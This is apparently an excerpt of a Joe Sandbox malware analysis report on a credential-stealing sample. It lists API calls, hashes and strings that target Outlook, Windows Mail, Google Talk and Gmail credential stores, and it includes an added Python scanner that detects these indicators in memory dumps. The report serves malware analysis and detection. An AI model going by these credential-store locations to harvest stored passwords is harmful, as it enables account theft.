                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                              • _mbscpy.MSVCRT ref: 00403E54
                                                                                              Strings
                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                              • pstorec.dll, xrefs: 00403C30
                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • memcpy.MSVCRT ref: 0040FBE4
                                                                                              • memcpy.MSVCRT ref: 0040FBF9
                                                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                              • String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                                                              • memset.MSVCRT ref: 00444379
                                                                                              • memset.MSVCRT ref: 00444394
                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                              Strings
                                                                                              • Store Root, xrefs: 004443A5
                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • memcpy.MSVCRT ref: 0040F652
                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                              • String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                              • _mbscpy.MSVCRT ref: 0040388B
                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                              • _mbscpy.MSVCRT ref: 004038CD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                              • String ID: %s@yahoo.com
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
Control-flow Graph (rendered graph not reproduced; block ranges recovered from the graph data)
• 4034e4-403544: memset ×2, call 410b1e; falls through to 403580-403582 or to 403546-40357f
• 403546-40357f: _mbscpy, call 406d55, _mbscat, call 4033f0; then 403580-403582
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403504
                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                              • _mbscpy.MSVCRT ref: 00403555
                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                              • API String ID: 3071782539-966475738
                                                                                              • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                              • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
Control-flow Graph (rendered graph not reproduced; block ranges recovered from the graph data)
• 40ccd7-40cd06: ??2@YAPAXI@Z (operator new); branches to 40cd08-40cd0d or 40cd0f, both joining at 40cd11-40cd24
• 40cd11-40cd24: ??2@YAPAXI@Z (operator new); branches to 40cd26-40cd2d (call 404025) or 40cd2f, both joining at 40cd31-40cd57
• 40cd31-40cd57: optionally 40cd59-40cd60 (DeleteObject), then 40cd66-40cdd9
• 40cd66-40cdd9: call 407088, call 4019b5, memset, LoadIconA, call 4019b5, _mbscpy
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 2054149589-0
                                                                                              • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                              • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                              APIs
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                              • memset.MSVCRT ref: 00408671
                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                              Strings
                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                              • API String ID: 1366857005-1079885057
                                                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
Control-flow Graph (rendered graph not reproduced; block ranges recovered from the graph data)
• 40ba28-40ba3a: entry; loops over 40ba3c-40ba52 (call 407e20, _mbsicmp), 40ba54-40ba6d (call 407e20), 40ba6f-40ba76 (call 40b5e5), 40ba7b-40ba85, until the argument list is exhausted
• 40ba87-40ba9b: call 406c62; then 40ba9d, which calls one of 4107f1, 404734, 404785, 403c16, 410a9c
• 40baa0-40bab3: call 407e30; branches to 40bab5-40bac1 / 40bac3-40bace and 40bad8-40baf7 (qsort), or directly to 40bafa-40bb09 (SetCursor)
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 882979914-1578091866
                                                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
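The String IDs of the functions in this report combine mail and instant-messenger credential-store locations (Software\Group Mail with InstallPath and fb.dat, Software\Google\Google Talk\Accounts) with the /stext, /sort and /nosort switches that NirSoft-style password-recovery tools accept on their command line. The following scanner is an added example, not code from the Joe Sandbox report or from the sample: it searches a process memory dump for those strings in both ASCII and UTF-16LE form and only raises a strong verdict when a credential-store path and a report switch occur together. The grouping of the strings, the verdict rule and the sample dump bytes are this example's own assumptions.

```python
"""Added example (not part of the Joe Sandbox report or the sample): scan a
process memory dump for the credential-harvesting indicators that appear in the
report's function dumps. The dump bytes below are constructed for the example."""
from __future__ import annotations

from dataclasses import dataclass

# Strings taken from the report's String IDs. Grouping them into "credential
# store paths" and "report/output switches" is this example's own assumption:
# the registry paths and fb.dat are where mail/IM clients keep account data,
# while /stext, /sort and /nosort are output switches of NirSoft-style
# password recovery tools.
CREDENTIAL_STORES: tuple[bytes, ...] = (
    b"Software\\Google\\Google Talk\\Accounts",
    b"Software\\Group Mail",
    b"fb.dat",
)
REPORT_SWITCHES: tuple[bytes, ...] = (b"/stext", b"/sort", b"/nosort")


@dataclass(frozen=True)
class Hit:
    indicator: str
    encoding: str  # "ascii" or "utf-16le"
    offset: int


def _needles(indicator: bytes):
    """Yield the ASCII and the UTF-16LE form of an indicator; the same strings
    may sit wide in memory (the report shows MultiByteToWideChar in use)."""
    yield "ascii", indicator
    yield "utf-16le", indicator.decode("ascii").encode("utf-16-le")


def find_indicators(dump: bytes) -> list[Hit]:
    """Return every occurrence of every indicator with its encoding and offset."""
    hits: list[Hit] = []
    for indicator in CREDENTIAL_STORES + REPORT_SWITCHES:
        for encoding, needle in _needles(indicator):
            start = 0
            while (pos := dump.find(needle, start)) != -1:
                hits.append(Hit(indicator.decode("ascii"), encoding, pos))
                start = pos + 1
    return hits


def classify(dump: bytes) -> tuple[str, list[Hit]]:
    """Verdict rule (assumption): a credential-store path alone is weak
    evidence, since a host that merely has the client installed carries the key
    name in memory; the path together with a report switch is what marks an
    embedded password-recovery tool."""
    hits = find_indicators(dump)
    seen = {h.indicator.encode("ascii") for h in hits}
    has_store = bool(seen & set(CREDENTIAL_STORES))
    has_switch = bool(seen & set(REPORT_SWITCHES))
    if has_store and has_switch:
        return "password-recovery-tool", hits
    if has_store or has_switch:
        return "weak", hits
    return "clean", hits


# Constructed dump: one ASCII registry path, one ASCII switch and one UTF-16LE
# registry path, padded with NULs. Not taken from the real sample.
CONSTRUCTED_DUMP = (
    b"\x00" * 16
    + b"Software\\Google\\Google Talk\\Accounts\x00"
    + b"/stext\x00"
    + "Software\\Group Mail".encode("utf-16-le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    verdict, found = classify(CONSTRUCTED_DUMP)
    print(verdict)
    for h in found:
        print(f"  {h.offset:#010x} {h.encoding:8} {h.indicator}")
```

On a real case, feed the scanner the bytes of the relevant memory dump (here the 0000000D.00000002.*.sdmp region the report analysed) rather than the constructed buffer; a "weak" result on a dump from an unrelated process is expected when the client in question is installed, and only the combined verdict is worth alerting on.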
                                                                                              APIs
                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                              • _mbscpy.MSVCRT ref: 00410E87
                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 889583718-2036018995
                                                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3143880245-0
                                                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@mallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3831604043-0
                                                                                              • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                              • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                              APIs
                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                                                              • String ID: Arial
                                                                                              • API String ID: 3853255127-493054409
                                                                                              • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                              • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                              APIs
                                                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$_strcmpimemset
                                                                                              • String ID: /stext
                                                                                              • API String ID: 520177685-3817206916
                                                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
